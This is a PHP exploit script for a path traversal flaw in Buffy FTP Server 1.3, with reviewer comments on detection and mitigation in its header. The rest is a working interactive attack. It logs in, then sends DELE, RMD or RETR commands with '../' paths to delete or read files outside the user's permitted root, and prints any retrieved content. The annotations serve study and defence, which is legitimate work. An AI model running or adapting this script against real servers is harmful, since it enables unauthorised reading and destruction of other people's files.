<?php
# -----------------------------------------------------------------------------
# Exploit Title: Buffy v1.3 Remote Directory Traversal Exploit
# Date: 31/10/2010
# Author: Pr0T3cT10n
# Software Link: http://www.smotricz.com/opensource/buffy/Buffy.zip
# Affected Version: 1.3
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# Credits as given in the original listing ("Live by the byte"):
#   Members: Pr0T3cT10n, -=M.o.B.=-, TheLeader, Sro, Debug
#   Contact: inv0ked.israel@gmail.com
# -----------------------------------------------------------------------------
# Proof of concept for a path traversal vulnerability in Buffy FTP Server.
# According to the advisory, a logged-in but otherwise unprivileged FTP user
# can read files, and delete files and folders, that the account has no
# permission to access. The affected FTP commands are:
#   * RETR - Read File
#   * RMD  - Remove Directory
#   * DELE - Delete File
#
# Reviewer notes (defensive reading):
#   * The script authenticates with USER/PASS first, so what it demonstrates
#     is a post-login issue. Whether an anonymous login is enough is not
#     shown here.
#   * The sample paths climb with "../" segments, which suggests the server
#     does not confine the path argument of these commands to the account's
#     root directory (inferred from the advisory, not from server code).
#   * Detection: the FTP control channel is plain text, so server command
#     logs or network captures showing ".." path segments in the arguments
#     of RETR, RMD or DELE are the obvious indicator.
#   * Mitigation: the server side has to resolve the requested path to its
#     canonical form and refuse anything that ends up outside the account's
#     root before opening or deleting it. Until the server does that, run the
#     service under a low-privilege OS account and restrict who can reach it.
#     This listing names no fixed version.
# -----------------------------------------------------------------------------

error_reporting(E_ALL);

# All four arguments are required. The usage text mentions a default port,
# but nothing below supplies one.
if (count($argv) <= 4) {
    echo "\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n"
        . "\tHOST - An host using Buffy FTP Server\r\n"
        . "\tPORT - Default is 21\r\n"
        . "\tUSER - Username\r\n"
        . "\tPASS - Password\r\n";
    exit("\r\n");
}

# $argv[0] (the script name) is skipped; it is only needed for the usage text.
[, $host, $port, $user, $pass] = $argv;

# Control connection, 5 second connect timeout.
$control = fsockopen($host, $port, $errno, $errstr, 5);
if (!$control) {
    exit("(-) Unable to connect to {$host}:{$port}\r\n");
}
echo "(+) Connected to the FTP server at '{$host}' on port {$port}\r\n";

# Log in. Each server reply is read and thrown away, so a rejected login is
# not noticed at this point.
fread($control, 1024);
fwrite($control, "USER {$user}\r\n");
fread($control, 1024);
fwrite($control, "PASS {$pass}\r\n");
fread($control, 1024);

echo "(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n";
$choice = rtrim(fgets(STDIN));

# Map the menu entry to one of the three commands named in the advisory.
# switch compares loosely, exactly like the `==` chain it stands in for.
switch ($choice) {
    case 1:
        $verb = "DELE";
        $prompt = "(~) Path to file(for example: ../../../test.txt): ";
        break;
    case 2:
        $verb = "RMD";
        $prompt = "(~) Path to directory(for example: ../../../test): ";
        break;
    case 3:
        $verb = "RETR";
        $prompt = "(~) Path to file(for example: ../../../test.txt): ";
        break;
    default:
        exit("(-) You have to choose correctly.\r\n");
}

echo $prompt;
$target = rtrim(fgets(STDIN));
if ($target == '') {
    exit("(-) Empty path.\r\n");
}

if ($verb === "RETR") {
    # RETR needs a data channel: ask for passive mode and take the endpoint
    # from the "(h1,h2,h3,h4,p1,p2)" tuple in the reply. The reply is not
    # validated, and the data connection goes to whatever address it names.
    fwrite($control, "PASV\r\n");
    $reply = fread($control, 1024);
    $fields = explode(',', $reply);
    $head = explode('(', $fields[0]);
    $dataHost = implode('.', [$head[1], $fields[1], $fields[2], $fields[3]]);
    $tail = explode(')', $fields[5]);
    $dataPort = ($fields[4] * 256) + $tail[0];

    fwrite($control, "{$verb} {$target}\r\n");
    fread($control, 1024);

    # A single read: at most the first 1024 bytes of the transfer are shown.
    $data = fsockopen($dataHost, $dataPort, $errno, $errstr, 5);
    if ($data) {
        echo fread($data, 1024);
    }
} else {
    # DELE and RMD are answered on the control channel; print that reply.
    fwrite($control, "{$verb} {$target}\r\n");
    echo fread($control, 1024);
}